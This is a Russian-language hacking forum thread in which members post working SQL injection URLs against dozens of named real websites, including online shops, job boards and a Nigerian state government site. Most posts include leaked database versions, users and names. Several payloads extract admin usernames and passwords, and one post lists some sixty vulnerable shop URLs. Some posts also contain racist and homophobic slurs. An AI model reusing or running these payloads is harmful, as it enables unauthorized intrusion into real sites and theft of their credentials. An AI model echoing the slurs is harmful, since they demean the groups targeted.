SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n1ck

    n1ck New Member

    Joined:
    6 Sep 2007
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,5,6--
     
    2 people like this.
  2. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    de.varesehotels.it

    Code:
    http://de.varesehotels.it/territorio/145-beata-vergine-dei-miracoli.php?km=50+union+select
    
    +1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database
    
    %28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36
    
    ,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62+--+
    Code:
    5.0.51a-24+lenny1:varetels_db@localhost:varetels_db
     
    1 person likes this.
  3. eclipze0

    eclipze0 New Member

    Joined:
    4 Dec 2009
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    http://www.thaikaspersky.com/2010/newheader/newsview2010.php?id=67+and+1=2+union+all+select+1,2,concat(0x3a,version(),user(),database()),4

    Инжект от Unu.
     
    1 person likes this.
  4. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    lesenschreiben.ch PR-4

    Code:
    http://www.lesenschreiben.ch/cms/page.php?p=-1+union+select+1,2,3,4,5,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+
    Code:
    5.0.67-log:[email protected]:lesen-schreiben-schweizch
    airbase-bern.ch PR-3

    Code:
    http://www.airbase-bern.ch/cms/page.php?p=1&img=-1+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+from+adm_user+--+
    Code:
    5.0.67-log:[email protected]:airbase-bernch
    lesen-schreiben-schweiz.ch PR-4

    Code:
    http://www.lesen-schreiben-schweiz.ch/cms/page.php?p=-18+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database())+--+
    Code:
    5.0.67-log:[email protected]:lesen-schreiben-schweizch
    volets-du-rhone.ch

    Code:
    http://www.volets-du-rhone.ch/sgcms/cms/page.php?p=-42+union+select+1,2,3,4,5,6,7,8,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29%29,10,11,12+--+
    Code:
    4.1.11-nt:[email protected]:volets-du-rhone
    jpgpeinture.ch

    Code:
    http://www.jpgpeinture.ch/cms/page.php?p=-2+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+
    Code:
    5.0.67-log:[email protected]:jpgpeinturech
    botennis.ch

    Code:
    http://www.botennis.ch/sgcms/cms/page.php?p=-20+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29+--+
    Code:
    5.0.67-log:[email protected]:botennisch1
     
    3 people like this.
  5. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,178
    Likes Received:
    617
    Reputations:
    690
    Шопы
    Code:
    http://www.nutrecare.co.uk/latest_detail.asp?prod_id=1268&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.ukrooflights.co.uk/latest_detail.asp?prod_id=519&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.planetdancedirect.com/latest_detail.asp?prod_id=8208&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.planetdancedirect.co.uk/latest_detail.asp?prod_id=8683&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.hyundai-generators.co.uk/latest_detail.asp?prod_id=478&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.nix-digital.com/latest_detail.asp?prod_id=129&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.funthinking.co.uk/latest_detail.asp?prod_id=95&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.startskating.co.uk/latest_detail.asp?prod_id=19&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.australiandesignstore.com/latest_detail.asp?prod_id=345&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.teddyandme.co.uk/latest_detail.asp?prod_id=36&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.yesdoit.co.uk/latest_detail.asp?prod_id=507&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.horseheavensaddlery.co.uk/latest_detail.asp?prod_id=265&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bebebel.co.uk/latest_detail.asp?prod_id=204&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.sharpquips.co.uk/latest_detail.asp?prod_id=8406&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.hamradio4u.co.uk/latest_detail.asp?prod_id=672&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://internettackleshop.co.uk/latest_detail.asp?prod_id=1305&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bestpriceappliances.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3359&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.stagwatches.co.uk/latest_detail.asp?prod_id=114&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bestpricefilters.co.uk/latest_detail.asp?prod_id=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=497&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.neoartglass.co.uk/latest_detail.asp?prod_id=569&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.spencercollection.com/latest_detail.asp?prod_id=8365&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.theelectricgateshop.co.uk/latest_detail.asp?prod_id=1271&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.teddyandme.co.uk/latest_detail.asp?prod_id=22&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.theboarding-house.co.uk/latest_detail.asp?prod_id=484&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.reds-superstore.co.uk/latest_detail.asp?prod_id=286&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.barnsleycarwarehouse.co.uk/latest_detail.asp?prod_id=8804&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.lasersurveyequipment.co.uk/latest_detail.asp?prod_id=1354&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.banglesnjangles.co.uk/latest_detail.asp?prod_id=6&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.litespot.co.uk/latest_detail.asp?prod_id=3638&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.elements-jewellery.co.uk/latest_detail.asp?prod_id=158&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.cornwallis-images.com/latest_detail.asp?prod_id=340&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.funthinking.co.uk/latest_detail.asp?currency=1&prod_id=212&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.funkyrascals.co.uk/latest_detail.asp?prod_id=118&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://brfcdirect.co.uk/latest_detail.asp?prod_id=264&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.trustsport.co.uk/latest_detail.asp?prod_id=260&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.moroccandecor.co.uk/latest_detail.asp?prod_id=9078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.photo-bug.co.uk/latest_detail.asp?prod_id=514&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8081&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://bigdogcustom.com/latest_detail.asp?prod_id=132&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.dekapakltd.co.uk/latest_detail.asp?prod_id=73&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.jewellerytraders.co.uk/latest_detail.asp?prod_id=76&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.memoryuniverse.co.uk/latest_detail.asp?prod_id=128&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bigbrandchina.eu/latest_detail.asp?prod_id=3357&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.christmasinabox.co.uk/latest_detail.asp?prod_id=476&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.chairoutlet.co.uk/latest_detail.asp?prod_id=488&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.australiandesignstore.com/latest_detail.asp?prod_id=401&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://thatsthephone.co.uk/latest_detail.asp?currency=1&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.highlandtackle.co.uk/latest_detail.asp?prod_id=211&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bigfellasclothing.com/latest_detail.asp?prod_id=288&offset=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.penandlolly.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=226&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bestpriceappliances.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.bestpricefilters.co.uk/latest_detail.asp?currency=3&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://smartmerchantshoppingcart.co.uk/latest_detail.asp?prod_id=8078&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://bigdogcustom.com/latest_detail.asp?prod_id=119&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
    http://www.southgeorgia.absolutewebhosting2.co.uk/latest_detail.asp?prod_id=116&id=&grpid=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9/*
     
    _________________________
    #11265 shell_c0de, 20 Dec 2009
    Last edited: 20 Dec 2009
    10 people like this.
  6. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,178
    Likes Received:
    617
    Reputations:
    690
    Code:
    http://ru-board.com/new/search.php?author=-lynx%27+union+select+1,2,3,concat_ws%28%27.%27,table_schema,table_name,column_name%29,5,6,7,8,9,10+from+information_schema.columns+--+
    version 5.0.77
    database phpnuke
    user phpnuke@localhost
     
    _________________________
  7. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,8,9,1,1,0,1,5--
    
    astrakha_board@localhost:astrakha_board:4.1.25


    Code:
    http://board.astrakhan.ws/?act=viewadv&id=-1707+union+select+1,2,3,4,5,6,group_concat%28login,0x3a,password%29,8,8,9,1,1,0,1,5+from+users--
    
     
    1 person likes this.
  8. fox_malder

    fox_malder Active Member

    Joined:
    28 Nov 2008
    Messages:
    162
    Likes Received:
    131
    Reputations:
    73
    http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+--+

    5.0.22
    crescendo_en
    cr@localhost
    redhat-linux-gnu

    http://www.crescendo.ro/en/solutii.php?id=-6+and+0+union+select+concat_ws(0x20,password)+from+admin+--+
     
  9. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Omega-time:

    Code:
    http://www.omega-time.ru/watches.phtml?idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    Version: 5.0.88
    Database: OmegaSQL
    User: OmegaSQL@localhost
     
  10. @D_

    @D_ New Member

    Joined:
    29 Jul 2009
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    Версия 5.0.67-log
    Пользователь [email protected]


    Code:
    http://06-r2.ru/news.php?id=99999999999+UNION SELECT CONCAT(1,CHAR(44)),2,CONCAT(3,CHAR(44)),4,CONCAT(5,CHAR(44)),CONCAT(6,CHAR(44)),CONCAT(7,CHAR(44))-- 
    Версия 4.0.27-max-log
    Пользователь [email protected]


    Code:
    http://www.03reclama.ru/03reclama_new/Catalog/index.php?id_parent=99999999999+UNION SELECT 1,CONCAT(2,CHAR(44)),CONCAT(3,CHAR(44)),CONCAT(4,CHAR(44)),5,6,7-- 
     
    #11270 @D_, 22 Dec 2009
    Last edited by a moderator: 22 Dec 2009
  11. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://jobs.webdesignerwall.com/job.php?id=-448+union+all+select+1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11--
    designer_admin2@localhost
    designer_jobs
    4.1.22-standard

    Code:
    http://jobs.neurope.eu/job.php?id=-1758+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
    neweuro_kostas@localhost
    neweuro_corporate
    4.1.22-standard

    Code:
    http://www.adclubct.org/job-bank/job.php?id=-19+union+select+1,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,5,6,7--
    tdwestne_adclub@localhost
    tdwestne_adclubct
    5.0.85-community-log


    Code:
    http://www.gexecutives.com/job.php?ID=-201+union+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
    sfaddoul@localhost
    sfaddoul_gexec
    5.0.85-community
     
    3 people like this.
  12. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.nlpplanning.com/vacancy.php?id=-55+UNION+SELECT+1,22,3,4,5,6,7,8,9,10,11,12,13

    Database Version: 4.0.30-log
    Database name: u10001284
    User name: [email protected]
     
    1 person likes this.
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Версия - 5
    БД - mexaldbsource
    Юзер - [email protected]

    админка по обычному адресу какая то лажа, а вот в другом месте норм)
     
  14. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    version: 5.0.86-percona-highperf-b19
     
    #11274 -=Razor=-, 24 Dec 2009
    Last edited by a moderator: 24 Dec 2009
  15. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.aztecadventure.co.uk/content.php?cid=22+UNION+SELECT+1,2,3,2,5,6,7,8,9,10/*

    Database Version: 4.1.20
    Database name: aztec
    User name: aztec_user@localhost

    там и без иньекции ошибка
     
    1 person likes this.
  16. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    www.chrisjordan.com
    Code:
    http://www.chrisjordan.com/current_set2.php?id=-11'+union+select+1,concat_ws(CHAR(60,98,114,47,62),version(),database(),user()),3,4,5/*
    ver: 4.1.22-max-log
    db: cjordanwebdata
    user: [email protected]

    www.reefcheck.org
    либо у меня руки не из того места растут, либо там действитеьно нет аксесса к юзерам.
    Но на всякий выложу.
    Code:
    http://www.reefcheck.org/news/news_detail.php?id=252+and+1=2+union+select+concat_ws%280x3a,%20table_name,%20table_schema,column_name%29,2,3+from+information_schema.columns+where+table_name=CHAR%2897,99,99,111,117,110,116%29/*
    neoboy.ru
    Code:
    http://neoboy.ru/goods.php?id=948+and+1=2+union+select+1,2,group_concat%28password%29,4,5,group_concat%28login%29,7,8+from+neoboy_admin-- 
    Чтоб эти геи в аду сгорели ....
     
  17. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Новогодний привет bluesoleil'у =)

    http://www.bluesoleil.com/products/Default.aspx?TID=-7'+union+select+1/*

    version: 5.1.34-community
    user: bluesoleil@localhost
    database: bluesoleil
    os: Win32

    ТИЦ: 90
    PR: 4
     
    #11277 aka_zver, 26 Dec 2009
    Last edited: 26 Dec 2009
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Code:
    http://www.insanely-great.com/news.php?id=-1514+union+select+concat_ws(0x3a,user(),database(),version())
    
    [email protected]:flamini_igm:4.1.21-log
    Code:
    http://www.ziggymarley.com/news.php?status=sort&id=6'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)+--+
    
    5.0.67-log
    Code:
    http://www.digitalsynapsis.tv/news.php?id=-32+union+select+1,2,concat_ws(0x3a,username,password,email),4+from+utenti
    
     
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Думал, что в Нигерии только деревянные хижины и дикари-негры полуголые .. хех

    http://www.lagosstate.gov.ng/showeventlist.php?index.php?page=event&evday=14&evmon=12&evyear=2009+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+0x257061737325--+
     
    2 people like this.
  20. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    www.nirvanaaudiovisual.co.uk - MySQL 5
    Code:
    http://www.nirvanaaudiovisual.co.uk/product_desc.php?id=383+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,admin_firstname,admin_password%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin--
    www.powertel.co.id - MySQL 5
    Code:
    http://www.powertel.co.id/news.php?idm=11&idy=2008+and+1=2+union+select+1,2,3,concat_ws%280x3a,username,password%29,5,6,7+from+login--
    www.sierracorporation.com - MySQL 5
    Code:
    http://www.sierracorporation.com/news.php?id=99%27+and+1=2+union+select+1,2,3,4,group_concat%28concat_ws%280x3a,username,password%29%29,6,7,8,9,10,11,12,131,14+from+users+--+
    www.cpehn.org - MySQL 5
    Code:
    http://www.cpehn.org/register.php?id=111+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,loginname,password%29%29,3,4+from+users--
    www.humanedgetech.com - MySQL 5
    Code:
    http://www.humanedgetech.com/news.php?id=15649+and+1=2+union+select+1,group_concat%28table_name%29,3,4,5,6,7+from+information_schema.tables+where+table_name+like+CHAR%2837,117,115,101,114,37%29--
    www.u2wanderer.org - MySQL 4
    Code:
    http://www.u2wanderer.org/disco/lyrics.php?id=424+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws%28CHAR%2860,98,114,47,62%29,version%28%29,database%28%29,user%28%29%29,9--
    www.insanely-great.com - MySQL 4
    Code:
    http://www.insanely-great.com/news.php?id=6553+and+1=2+union+select+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
     
    4 people like this.
Thread Status:
Not open for further replies.